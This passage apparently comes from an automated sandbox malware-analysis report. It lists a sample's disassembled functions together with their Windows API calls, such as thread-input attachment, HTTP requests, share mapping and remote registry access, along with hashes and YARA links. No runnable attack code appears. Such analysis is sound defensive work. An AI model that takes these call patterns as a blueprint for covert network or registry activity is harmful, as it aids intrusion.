                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArraySafeVartype
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1725837607-0
                                                                                                                                                          • Opcode ID: 9b0cf8f95c7e086ea696bbc3e849a2870dc7404f88bef812cbaa7cae827517b1
                                                                                                                                                          • Instruction ID: 892e3facf9b341f1cca1de4a5ae97b01debd58740ed521bc622d197247641df5
                                                                                                                                                          • Opcode Fuzzy Hash: 9b0cf8f95c7e086ea696bbc3e849a2870dc7404f88bef812cbaa7cae827517b1
                                                                                                                                                          • Instruction Fuzzy Hash: CEC16975A0821A9FDB04CF98D8D1BAEB7F4FF09315F20406AE616E7351D734AA91CB90
                                                                                                                                                          Function 0014BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __lock.LIBCMT ref: 0014BA74
                                                                                                                                                            • Part of subcall function 00148984: __mtinitlocknum.LIBCMT ref: 00148996
                                                                                                                                                            • Part of subcall function 00148984: RtlEnterCriticalSection.NTDLL(00140127), ref: 001489AF
                                                                                                                                                          • __calloc_crt.LIBCMT ref: 0014BA85
                                                                                                                                                            • Part of subcall function 00147616: __calloc_impl.LIBCMT ref: 00147625
                                                                                                                                                            • Part of subcall function 00147616: Sleep.KERNEL32(00000000,?,00140127,?,0012125D,00000058,?,?), ref: 0014763C
                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0014BAA0
                                                                                                                                                          • GetStartupInfoW.KERNEL32(?,001D6990,00000064,00146B14,001D67D8,00000014), ref: 0014BAF9
                                                                                                                                                          • __calloc_crt.LIBCMT ref: 0014BB44
                                                                                                                                                          • GetFileType.KERNEL32(00000001), ref: 0014BB8B
                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0014BBC4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1426640281-0
                                                                                                                                                          • Opcode ID: 0ebb67aef2774be91b17f12e6c7d4487d3a5cfdd34e1b7f60c0c88dc8466fd74
                                                                                                                                                          • Instruction ID: e00390663186db98197e15c36ccabc470c63e91bb963fa273f2c5ca1e6849069
                                                                                                                                                          • Opcode Fuzzy Hash: 0ebb67aef2774be91b17f12e6c7d4487d3a5cfdd34e1b7f60c0c88dc8466fd74
                                                                                                                                                          • Instruction Fuzzy Hash: 7A81CF709097458FDB14CFA8D8D06ADBBF0EF59324B24425DD4AAAB3E1CB34D842CB55
                                                                                                                                                          Function 00167212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __swprintf.LIBCMT ref: 00167226
                                                                                                                                                          • __swprintf.LIBCMT ref: 00167233
                                                                                                                                                            • Part of subcall function 0014234B: __woutput_l.LIBCMT ref: 001423A4
                                                                                                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 0016725D
                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00167269
                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00167276
                                                                                                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00167296
                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 001672A8
                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 001672B7
                                                                                                                                                          • LockResource.KERNEL32(?), ref: 001672C3
                                                                                                                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00167322
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1433390588-0
                                                                                                                                                          • Opcode ID: 40b8b166760b8e10437773d901c19bdef1a6a7f3b3a2c44dbaa74e9b5144261b
                                                                                                                                                          • Instruction ID: 9c216423bd849be865c8a54bd6d11019bce709005a2217aceda72430e4935798
                                                                                                                                                          • Opcode Fuzzy Hash: 40b8b166760b8e10437773d901c19bdef1a6a7f3b3a2c44dbaa74e9b5144261b
                                                                                                                                                          • Instruction Fuzzy Hash: 6731907590425ABBDB019F60EC95ABF7BB9FF09344F004425FD02D6690E734D9A0DAA0
                                                                                                                                                          Function 00164A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00164A7D
                                                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00163AD7,?,00000001), ref: 00164A91
                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00164A98
                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00163AD7,?,00000001), ref: 00164AA7
                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00164AB9
                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00163AD7,?,00000001), ref: 00164AD2
                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00163AD7,?,00000001), ref: 00164AE4
                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00163AD7,?,00000001), ref: 00164B29
                                                                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00163AD7,?,00000001), ref: 00164B3E
                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00163AD7,?,00000001), ref: 00164B49
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2156557900-0
                                                                                                                                                          • Opcode ID: 524ab48dcf8617b7066de0938102abdce93838a28170b42bd46f806791f7deaa
                                                                                                                                                          • Instruction ID: efc6d0ab83ab9d264560e9c1765855937694407f0b3d617709f23d99aaef6df1
                                                                                                                                                          • Opcode Fuzzy Hash: 524ab48dcf8617b7066de0938102abdce93838a28170b42bd46f806791f7deaa
                                                                                                                                                          • Instruction Fuzzy Hash: 2931A0B1601644BFDB249BA4ECCDBBEB7AAEB51311F184005F916DB990D7B4DE808B60
                                                                                                                                                          Function 0019EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetClientRect.USER32(?), ref: 0019EC32
                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0019EC49
                                                                                                                                                          • GetWindowDC.USER32(?), ref: 0019EC55
                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0019EC64
                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0019EC76
                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0019EC94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                          • Opcode ID: f0cb9bcabd19f8ca79e7d68a5ec6df548e35d8bda96146ef2211263dee1dc84a
                                                                                                                                                          • Instruction ID: def7f676abb0a0baffd0818629d09f0248b07cbe6b0ca2d1ac3ef6e5b16d87df
                                                                                                                                                          • Opcode Fuzzy Hash: f0cb9bcabd19f8ca79e7d68a5ec6df548e35d8bda96146ef2211263dee1dc84a
                                                                                                                                                          • Instruction Fuzzy Hash: 37215C71500604BFDB21AF74FC48BA97BB1EB06321F104224FA2AA58E1DB314981DF11
                                                                                                                                                          Function 0015D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnumChildWindows.USER32(?,0015DD46), ref: 0015DC86
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChildEnumWindows
                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                          • API String ID: 3555792229-1603158881
                                                                                                                                                          • Opcode ID: bb8e1af74fa98f3293da86a1b3466f926f8f466311fd412eb89083a3d9dbff9e
                                                                                                                                                          • Instruction ID: 71b12fdcee2336b561258c67c83400cb698e416e3efc3656c9251b4e1aea568d
                                                                                                                                                          • Opcode Fuzzy Hash: bb8e1af74fa98f3293da86a1b3466f926f8f466311fd412eb89083a3d9dbff9e
                                                                                                                                                          • Instruction Fuzzy Hash: F391B430900506EACB1CDF60E481BEDFB75BF25301F548169EC6AAB251DB70699ECB90
                                                                                                                                                          Function 001245A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001245F0
                                                                                                                                                          • CoUninitialize.COMBASE ref: 00124695
                                                                                                                                                          • UnregisterHotKey.USER32(?), ref: 001247BD
                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00195936
                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0019599D
                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001959CA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                          • String ID: close all
                                                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                                                          • Opcode ID: 5729c9eacaa5f9f825b3b8639c2fbf35a1fd7a141007cbad7cbde672643a64a2
                                                                                                                                                          • Instruction ID: da9399efc096b88bef2333a376fcb248e37b29c97b13c89c498132034d14c37d
                                                                                                                                                          • Opcode Fuzzy Hash: 5729c9eacaa5f9f825b3b8639c2fbf35a1fd7a141007cbad7cbde672643a64a2
                                                                                                                                                          • Instruction Fuzzy Hash: 64914D34610622DFDB19EF14E895A68F3B5FF25704F5142A9E40AA7662DB30AE76CF00
                                                                                                                                                          Function 0013C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 0013C2D2
                                                                                                                                                            • Part of subcall function 0013C697: GetClientRect.USER32(?,?), ref: 0013C6C0
                                                                                                                                                            • Part of subcall function 0013C697: GetWindowRect.USER32(?,?), ref: 0013C701
                                                                                                                                                            • Part of subcall function 0013C697: ScreenToClient.USER32(?,000000FF), ref: 0013C729
                                                                                                                                                          • GetDC.USER32 ref: 0019E006
                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0019E019
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0019E027
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0019E03C
                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0019E044
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0019E0CF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                          • String ID: U
                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                          • Opcode ID: 0bf2a59239fd92464ac7b99634b2b8229c80e13d014b1781b45c8228387fe497
                                                                                                                                                          • Instruction ID: 3cc0fd5adbe42486666225ae4a2ba59c8fa367bea31c17996b761ed9b412a687
                                                                                                                                                          • Opcode Fuzzy Hash: 0bf2a59239fd92464ac7b99634b2b8229c80e13d014b1781b45c8228387fe497
                                                                                                                                                          • Instruction Fuzzy Hash: 4271F331600209EFCF25CFA4CC85AEA7BB5FF59350F184269FD566A1A6C7318C81DBA1
                                                                                                                                                          Function 00174C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00174C5E
                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00174C8A
                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00174CCC
                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00174CE1
                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00174CEE
                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00174D1E
                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00174D65
                                                                                                                                                            • Part of subcall function 001756A9: GetLastError.KERNEL32(?,?,00174A2B,00000000,00000000,00000001), ref: 001756BE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1241431887-3916222277
                                                                                                                                                          • Opcode ID: 35147f0a87edd1dd50977c3e9717f5c7e17a08c21410e7bfc3a2eac1f15086d4
                                                                                                                                                          • Instruction ID: f89211e1c9c2d88df887bf83c457a599c569a7b80908c33bd6bdfdf6a415446b
                                                                                                                                                          • Opcode Fuzzy Hash: 35147f0a87edd1dd50977c3e9717f5c7e17a08c21410e7bfc3a2eac1f15086d4
                                                                                                                                                          • Instruction Fuzzy Hash: 5341AFB1501618BFEB168FA4DC85FFB77BCEF09354F10811AFA099A151E7B09E448BA0
                                                                                                                                                          Function 0015AEE5 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • _memset.LIBCMT ref: 0015AF74
                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0015AFA9
                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0015AFC5
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0015B00B
                                                                                                                                                          • CLSIDFromString.COMBASE(?,?), ref: 0015B033
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
